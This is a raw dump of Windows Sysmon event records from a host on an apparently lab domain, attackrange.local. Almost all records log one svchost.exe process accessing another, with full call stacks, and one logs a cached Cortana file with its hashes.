12:02:17.429{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.414{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txtMD5=D2ECB824C1EBD5CAD726A8FA730F83BD,SHA256=9BA9C472659B68EC59A470063958FCF4C1B9F95670B884F95FF690DA601CADA6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
